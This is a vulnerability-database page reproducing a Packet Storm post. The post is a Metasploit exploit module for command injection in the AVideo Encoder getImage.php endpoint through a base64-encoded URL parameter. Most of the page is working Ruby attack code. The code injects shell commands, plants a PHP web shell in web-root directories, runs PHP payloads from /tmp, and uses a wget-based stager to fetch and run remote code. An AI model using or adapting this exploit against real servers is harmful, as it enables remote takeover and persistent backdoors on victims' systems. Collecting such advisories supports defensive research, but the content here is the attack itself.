Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 AVideo Command Injection

🗓️ 23 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 88 Views

AVideo Encoder getImage.php command injection in base64Url enables remote code execution.

Code
======================================================================================================================
    | # Title     : AVideo versions prior to 7.0 Metasploit Module Command Injection                                     |
    | # Author    : indoushka                                                                                            |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                     |
    | # Vendor    : https://www.avideo.com/                                                                              |
    ======================================================================================================================
    
    [+] Summary    : The Metasploit exploit module targets a command injection vulnerability in AVideo  
    				 This module exploits a base64-encoded command injection flaw in AVideo Encoder’s image processing endpoint, turning a simple URL parameter into remote code execution with multiple payload strategies.
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Exploit::FileDropper
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'AVideo Encoder getImage.php Command Injection',
          'Description'    => %q{
            Command injection in AVideo via base64Url parameter.
          },
          'Author'         => ['indoushka'],
          'License'        => MSF_LICENSE,
          'Platform'       => ['unix', 'linux', 'php'],
          'Arch'           => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
          'Targets'        => [
            ['Unix Command', { 'Type' => :unix_cmd }],
            ['PHP Command',  { 'Type' => :php_cmd }],
            ['Linux Dropper',{ 'Type' => :linux_dropper }]
          ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => '2020-10-15'
        ))
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
          OptString.new('WEBSHELL_NAME', [false, 'Webshell name', 'shell.php']),
          OptBool.new('UPLOAD_WEBSHELL', [false, 'Upload webshell', false])
        ])
    
        register_advanced_options([
          OptInt.new('Delay', [false, 'Delay', 1])
        ])
      end
    
      def execute_command(cmd)
        payload = build_payload(cmd)
    
        begin
          res = send_request_cgi({
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, 'Encoder', 'objects', 'getImage.php'),
            'vars_get' => {
              'base64Url' => payload,
              'format'    => 'png'
            },
            'timeout' => datastore['TIMEOUT']
          })
    
          return res&.body
        rescue ::Rex::ConnectionError
          return nil
        end
      end
    
      def build_payload(cmd)
        injected = "http://test.com/`#{cmd}`"
        Rex::Text.encode_base64(injected)
      end
    
      def exploit
        unless datastore['ForceExploit'] || check == Exploit::CheckCode::Vulnerable
          fail_with(Failure::NotVulnerable, 'Target not vulnerable')
        end
    
        print_status("Exploiting...")
    
        case target['Type']
        when :unix_cmd
          execute_command(payload.encoded)  
        when :php_cmd
          execute_php_payload
        when :linux_dropper
          execute_cmdstager
        end
    
        upload_webshell if datastore['UPLOAD_WEBSHELL']
      end
    
      def execute_php_payload
        print_status("Executing PHP payload...")
    
        php_code = "<?php system($_GET['cmd']); ?>"
        tmp_file = "/tmp/#{Rex::Text.rand_text_alpha(6)}.php"
    
        execute_command("echo '#{php_code}' > #{tmp_file}")
        register_file_for_cleanup(tmp_file)
    
        sleep(datastore['Delay'])
        execute_command("php #{tmp_file}")
      end
    
      def execute_cmdstager
        print_status("Running cmdstager...")
    
        super(
          :delay => datastore['Delay'],
          :flavor => :wget,
          :temp   => '/tmp'
        )
      end
    
      def upload_webshell
        print_status("Uploading webshell...")
    
        webshell = datastore['WEBSHELL_NAME']
        code = "<?php system($_GET['cmd']); ?>"
    
        paths = [
          datastore['WritablePath'],
          '/var/www/html/',
          '/var/www/',
          './'
        ]
    
        paths.each do |p|
          next if p.nil? || p.empty?
    
          path = p.end_with?('/') ? p : p + '/'
    
          execute_command("echo '#{code}' > #{path}#{webshell}")
          sleep(datastore['Delay'])
    
          res = execute_command("ls #{path}#{webshell}")
    
          if res && !res.include?("No such file")
            print_good("Webshell likely uploaded: #{path}#{webshell}")
            break
          end
        end
      end
    
      def print_status(msg)
        super("[AVideo] #{msg}")
      end
    
      def print_good(msg)
        super("[AVideo] #{msg}")
      end
    
      def print_error(msg)
        super("[AVideo] #{msg}")
      end
    
      def print_warning(msg)
        super("[AVideo] #{msg}")
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Mar 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
AVideo encodercommand injectionbase64 parameterimage processingremote code executionmetasploit module
88